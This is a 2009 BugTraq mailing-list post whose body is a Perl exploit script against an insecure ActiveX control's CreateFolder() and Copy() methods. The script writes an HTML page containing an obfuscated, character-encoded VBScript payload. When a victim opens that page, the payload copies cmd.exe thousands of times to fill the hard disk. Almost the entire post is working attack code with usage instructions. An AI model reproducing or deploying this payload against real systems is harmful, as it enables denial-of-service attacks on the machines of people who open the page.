BugTraq
COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method (Hard Disk Filler Exploit) Jul 17 2009 02:22PM
irancrash gmail com
#!/usr/bin/perl

###############################################################

# COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method (Hard Disk Filler Exploit)

#

# Discovered and Exploited by : Khashayar Fereidani

# Http://IRCRASH.com & Http://Fereidani.ir

#

###############################################################

# Help :

# perl comraider.pl

# Please enter the foldername (C:\ircrash\ for example) : C:\ircrash# Please enter number of copy cmd to folder (10000 or more for example) : 10000

# ** Ok comraider.html created , now you can use this

###############################################################

# Tnx : Only for God

###############################################################

$cmd = 'C:\WINDOWS\system32\cmd.exe';

print 'Please enter the foldername (C:\ircrash\ for example) : ';

$folder = <stdin>;

print "Please enter number of copy cmd to folder (10000 or more for example) : ";

$number = <stdin>;

chomp $number;

chomp $folder;

$shellcode = chr(0x3C).chr(0x48).chr(0x54).chr(0x4D).chr(0x4C).chr(0x3E).chr(0xD).chr
(0xA).chr(0x3C).chr(0x21).chr(0x2D).chr(0x2D).chr(0xD).chr(0xA).chr(0x43
).chr(0x4F).chr(0x4D).chr(0x52).chr(0x61).chr(0x69).chr(0x64).chr(0x65).
chr(0x72).chr(0x20).chr(0x49).chr(0x64).chr(0x65).chr(0x66).chr(0x65).ch
r(0x6E).chr(0x73).chr(0x65).chr(0x20).chr(0x4C).chr(0x61).chr(0x62).chr(
0x73).chr(0x20).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr(0x74).chr(0x
65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0x72).chr(0x28
).chr(0x29).chr(0x20).chr(0x61).chr(0x6E).chr(0x64).chr(0x20).chr(0x43).
chr(0x6F).chr(0x70).chr(0x79).chr(0x28).chr(0x29).chr(0x20).chr(0x49).ch
r(0x6E).chr(0x73).chr(0x65).chr(0x63).chr(0x75).chr(0x72).chr(0x65).chr(
0x20).chr(0x4D).chr(0x65).chr(0x74).chr(0x68).chr(0x6F).chr(0x64).chr(0x
20).chr(0x45).chr(0x78).chr(0x70).chr(0x6C).chr(0x6F).chr(0x69).chr(0x74
).chr(0xD).chr(0xA).chr(0x44).chr(0x69).chr(0x73).chr(0x63).chr(0x6F).ch
r(0x76).chr(0x65).chr(0x72).chr(0x65).chr
(0x64).chr(0x20).chr(0x62).chr(0x79).chr(0x20).chr(0x3A).chr(0x20).chr(0
x4B).chr(0x68).chr(0x61).chr(0x73).chr(0x68).chr(0x61).chr(0x79).chr(0x6
1).chr(0x72).chr(0x20).chr(0x46).chr(0x65).chr(0x72).chr(0x65).chr(0x69)
.chr(0x64).chr(0x61).chr(0x6E).chr(0x69).chr(0xD).chr(0xA).chr(0x68).chr
(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x66).chr(0
x65).chr(0x72).chr(0x65).chr(0x69).chr(0x64).chr(0x61).chr(0x6E).chr(0x6
9).chr(0x2E).chr(0x69).chr(0x72).chr(0x20).chr(0x26).chr(0x20).chr(0x68)
.chr(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x69).c
hr(0x72).chr(0x63).chr(0x72).chr(0x61).chr(0x73).chr(0x68).chr(0x2E).chr
(0x63).chr(0x6F).chr(0x6D).chr(0xD).chr(0xA).chr(0x2D).chr(0x2D).chr(0x3
E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x6F).chr(0x62).chr
(0x6A).chr(0x65).chr(0x63).chr(0x74).chr(0x20).chr(0x63).chr(0x6C).chr(0
x61).chr(0x73).chr(0x73).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x6
3).chr(0x6C).chr(0x73).chr(0x69).chr(0x64).chr(0x3A).
chr(0x39).chr(0x41).chr(0x30).chr(0x37).chr(0x37).chr(0x44).chr(0x30).ch
r(0x44).chr(0x2D).chr(0x42).chr(0x34).chr(0x41).chr(0x36).chr(0x2D).chr(
0x34).chr(0x45).chr(0x43).chr(0x30).chr(0x2D).chr(0x42).chr(0x36).chr(0x
43).chr(0x46).chr(0x2D).chr(0x39).chr(0x38).chr(0x35).chr(0x32).chr(0x36
).chr(0x44).chr(0x46).chr(0x35).chr(0x38).chr(0x39).chr(0x45).chr(0x34).
chr(0x27).chr(0x20).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x74).ch
r(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x27).chr(0x3E).chr(
0x3C).chr(0x2F).chr(0x6F).chr(0x62).chr(0x6A).chr(0x65).chr(0x63).chr(0x
74).chr(0x3E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x73).ch
r(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x20).chr(0x6C).chr(
0x61).chr(0x6E).chr(0x67).chr(0x75).chr(0x61).chr(0x67).chr(0x65).chr(0x
3D).chr(0x27).chr(0x76).chr(0x62).chr(0x73).chr(0x63).chr(0x72).chr(0x69
).chr(0x70).chr(0x74).chr(0x27).chr(0x3E).chr(0xD).chr(0xA).chr(0x61).ch
r(0x72).chr(0x67).chr(0x66).chr(0x3D).chr(0x22).$fold
er.chr(0x22).chr(0xD).chr(0xA).chr(0x74).chr(0x61).chr(0x72).chr(0x67).c
hr(0x65).chr(0x74).chr(0x2E).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr
(0x74).chr(0x65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0
x72).chr(0x20).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0xD).chr(0xA)
.chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).c
hr(0x20).chr(0x3D).chr(0x20).chr(0x30).chr(0xD).chr(0xA).chr(0x6E).chr(0
x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x20).chr(0x3
D).chr(0x20).$number.chr(0xD).chr(0xA).chr(0x77).chr(0x68).chr(0x69).chr
(0x6C).chr(0x65).chr(0x20).chr(0x28).chr(0x6E).chr(0x75).chr(0x6D).chr(0
x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3C).chr(0x20).chr(0x6
E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x29)
.chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr
(0x72).chr(0x31).chr(0x20).chr(0x3D).chr(0x20).chr(0x6E).chr(0x75).chr(0
x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20
).chr(0x2B).chr(0x20).chr(0x31).chr(0xD).chr(0xA).chr(0x61).chr(0x72).ch
r(0x67).chr(0x31).chr(0x3D).chr(0x22).$cmd.chr(0x22).chr(0xD).chr(0xA).c
hr(0x61).chr(0x72).chr(0x67).chr(0x32).chr(0x3D).chr(0x61).chr(0x72).chr
(0x67).chr(0x66).chr(0x20).chr(0x26).chr(0x20).chr(0x6E).chr(0x75).chr(0
x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x26).chr(0x2
0).chr(0x22).chr(0x2E).chr(0x65).chr(0x78).chr(0x65).chr(0x22).chr(0xD).
chr(0xA).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr
(0x2E).chr(0x43).chr(0x6F).chr(0x70).chr(0x79).chr(0x20).chr(0x61).chr(0
x72).chr(0x67).chr(0x31).chr(0x20).chr(0x2C).chr(0x61).chr(0x72).chr(0x6
7).chr(0x32).chr(0xD).chr(0xA).chr(0x77).chr(0x65).chr(0x6E).chr(0x64).c
hr(0xD).chr(0xA).chr(0x3C).chr(0x2F).chr(0x73).chr(0x63).chr(0x72).chr(0
x69).chr(0x70).chr(0x74).chr(0x3E);

print "** OK comraider.html created , now you can use this";

open(myfile,'>>comraider.html');

print myfile $shellcode;

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus